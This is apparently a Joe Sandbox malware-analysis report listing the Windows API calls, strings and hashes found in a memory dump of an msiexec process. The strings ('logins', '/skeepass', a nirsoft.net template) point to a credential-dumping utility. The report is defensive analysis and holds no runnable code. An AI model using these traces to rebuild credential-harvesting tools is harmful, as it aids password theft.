                                                                              • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                              • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                              • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                                            • String ID: logins$null
                                                                            • API String ID: 2148543256-2163367763
                                                                            • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                            • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                            • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                            • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                            APIs
                                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                            • memset.MSVCRT ref: 004085CF
                                                                            • memset.MSVCRT ref: 004085F1
                                                                            • memset.MSVCRT ref: 00408606
                                                                            • strcmp.MSVCRT ref: 00408645
                                                                            • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                            • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                            • memset.MSVCRT ref: 0040870E
                                                                            • strcmp.MSVCRT ref: 0040876B
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                            • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                            • String ID: ---
                                                                            • API String ID: 3437578500-2854292027
                                                                            • Opcode ID: 86eb99c19707b425fb2b039d8f5ba7922df37cc2677e68e6646184786069dd0e
                                                                            • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                            • Opcode Fuzzy Hash: 86eb99c19707b425fb2b039d8f5ba7922df37cc2677e68e6646184786069dd0e
                                                                            • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0041087D
                                                                            • memset.MSVCRT ref: 00410892
                                                                            • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                            • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                            • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                            • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                            • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                            • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                            • GetSysColor.USER32(0000000F), ref: 00410999
                                                                            • DeleteObject.GDI32(?), ref: 004109D0
                                                                            • DeleteObject.GDI32(?), ref: 004109D6
                                                                            • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                            • String ID:
                                                                            • API String ID: 1010922700-0
                                                                            • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                            • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                            • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                            • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                            APIs
                                                                              • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                            • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                            • malloc.MSVCRT ref: 004186B7
                                                                            • free.MSVCRT ref: 004186C7
                                                                            • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                            • free.MSVCRT ref: 004186E0
                                                                            • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                            • malloc.MSVCRT ref: 004186FE
                                                                            • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                            • free.MSVCRT ref: 00418716
                                                                            • free.MSVCRT ref: 0041872A
                                                                            • free.MSVCRT ref: 00418749
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: free$FullNamePath$malloc$Version
                                                                            • String ID: |A
                                                                            • API String ID: 3356672799-1717621600
                                                                            • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                            • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                            • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                            • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _wcsicmp
                                                                            • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                            • API String ID: 2081463915-1959339147
                                                                            • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                            • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                            • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                            • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                            APIs
                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                            • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                            • API String ID: 2012295524-70141382
                                                                            • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                            • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                            • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                            • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                            • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                            • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                            • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                            • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                            • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$HandleModule
                                                                            • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                            • API String ID: 667068680-3953557276
                                                                            • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                            • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                            • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                            • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                            APIs
                                                                            • GetDC.USER32(00000000), ref: 004121FF
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                            • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                            • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                            • SelectObject.GDI32(?,?), ref: 00412251
                                                                            • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                            • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                              • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                              • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                              • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                            • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                            • SetCursor.USER32(00000000), ref: 004122BC
                                                                            • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                            • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                            • String ID:
                                                                            • API String ID: 1700100422-0
                                                                            • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                            • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                            • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                            • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                            APIs
                                                                            • GetClientRect.USER32(?,?), ref: 004111E0
                                                                            • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                            • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                            • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                            • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                            • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                            • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                            • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                            • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                            • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                            • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                            • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                            • String ID:
                                                                            • API String ID: 552707033-0
                                                                            • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                            • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                            • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                            • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memset$_snwprintf
                                                                            • String ID: %%0.%df
                                                                            • API String ID: 3473751417-763548558
                                                                            • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                            • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                            • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                            • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                            APIs
                                                                            • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                            • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                            • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                            • GetTickCount.KERNEL32 ref: 0040610B
                                                                            • GetParent.USER32(?), ref: 00406136
                                                                            • SendMessageW.USER32(00000000), ref: 0040613D
                                                                            • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                            • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                            • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                            • String ID: A
                                                                            • API String ID: 2892645895-3554254475
                                                                            • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                            • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                            • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                            • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                            APIs
                                                                            • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                              • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                              • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                              • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                              • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                            • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                            • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                            • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                            • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                            • memset.MSVCRT ref: 0040DA23
                                                                            • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                            • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                            • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                              • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                            • String ID: caption
                                                                            • API String ID: 973020956-4135340389
                                                                            • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                            • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                            • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                            • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                            Strings
                                                                            • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                            • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                            • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                            • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memset$_snwprintf$wcscpy
                                                                            • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                            • API String ID: 1283228442-2366825230
                                                                            • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                            • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                            • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                            • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                            APIs
                                                                            • wcschr.MSVCRT ref: 00413972
                                                                            • wcscpy.MSVCRT ref: 00413982
                                                                              • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                              • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                              • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                            • wcscpy.MSVCRT ref: 004139D1
                                                                            • wcscat.MSVCRT ref: 004139DC
                                                                            • memset.MSVCRT ref: 004139B8
                                                                              • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                              • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                            • memset.MSVCRT ref: 00413A00
                                                                            • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                            • wcscat.MSVCRT ref: 00413A27
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                            • String ID: \systemroot
                                                                            • API String ID: 4173585201-1821301763
                                                                            • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                            • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                            • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                            • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: wcscpy
                                                                            • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                            • API String ID: 1284135714-318151290
                                                                            • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                            • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                            • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                            • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                            APIs
                                                                              • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                              • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                              • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                            • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                            • strchr.MSVCRT ref: 0040C140
                                                                            • strchr.MSVCRT ref: 0040C151
                                                                            • _strlwr.MSVCRT ref: 0040C15F
                                                                            • memset.MSVCRT ref: 0040C17A
                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
                                                                            • String ID: 4$h
                                                                            • API String ID: 4019544885-1856150674
                                                                            • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                            • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                            • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                            • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                            • String ID: 0$6
                                                                            • API String ID: 4066108131-3849865405
                                                                            • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                            • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                            • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                            • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                            APIs
                                                                            • memset.MSVCRT ref: 004082EF
                                                                              • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                            • memset.MSVCRT ref: 00408362
                                                                            • memset.MSVCRT ref: 00408377
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memset$ByteCharMultiWide
                                                                            • String ID:
                                                                            • API String ID: 290601579-0
                                                                            • Opcode ID: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                                            • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                            • Opcode Fuzzy Hash: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                                            • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                            APIs
                                                                            • memchr.MSVCRT ref: 00444EBF
                                                                            • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                            • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                            • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
